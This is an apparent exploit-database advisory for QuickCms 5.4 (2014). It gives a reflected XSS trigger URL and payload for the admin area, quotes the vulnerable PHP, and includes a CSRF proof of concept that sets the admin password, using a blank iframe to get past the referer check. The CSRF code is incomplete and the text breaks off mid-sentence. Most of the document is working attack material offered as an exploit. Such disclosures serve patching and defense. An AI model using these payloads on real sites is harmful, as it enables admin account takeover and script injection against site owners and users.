# Exploit Title: QuickCms 5.4 Multiple Vulnerabilites
# Date: 04/08/2014
# Author: shpendk
# Software Link: http://opensolution.org/download,en,18.html?sFile=Quick.Cms/Quick.Cms_v5.4.zip
# Version: 5.4
# Tested on: Xampp on Windows
Reflected XSS Vulnerability in Admin Area:
Trigger: http://localhost/quickcms/admin.php/123';alert(123);//abc?p=pages-form&iPage=14
Vulnerable code: in /quickcms/templates/admin/pages-form.php:
144: <script type="text/javascript">
145: var sPhpSelf = '<?php echo $_SERVER['PHP_SELF']; ?>';...
poc: anything';alert(123);//
Admin password change csrf:
function load() {
var postdata = '<form id=dynForm method=POST action=\'http://localhost/admin.php?p=tools-config\'>' +
'<input type=hidden name=sOption value=save login=admin />' +
'<input type=hidden name=pass value=admin1234 />' +
<body onload="load()">
<iframe src="about:blank" id="noreferer"></iframe>
Vulnerable code:
60: if( ( strstr( $p, '-delete' ) || count( $_POST ) > 0 ) && !empty( $_SERVER['HTTP_REFERER'] ) && !strstr( $_SERVER['HTTP_REFERER'], $_SERVER['SCRIPT_NAME'] ) ){
61:header( 'Location: '.$_SERVER['PHP_SELF'].'?p=error' );
The above code checks for the presence for a referer header, if there is no referer present the POST works fine. This is trivially bypassed using information from here: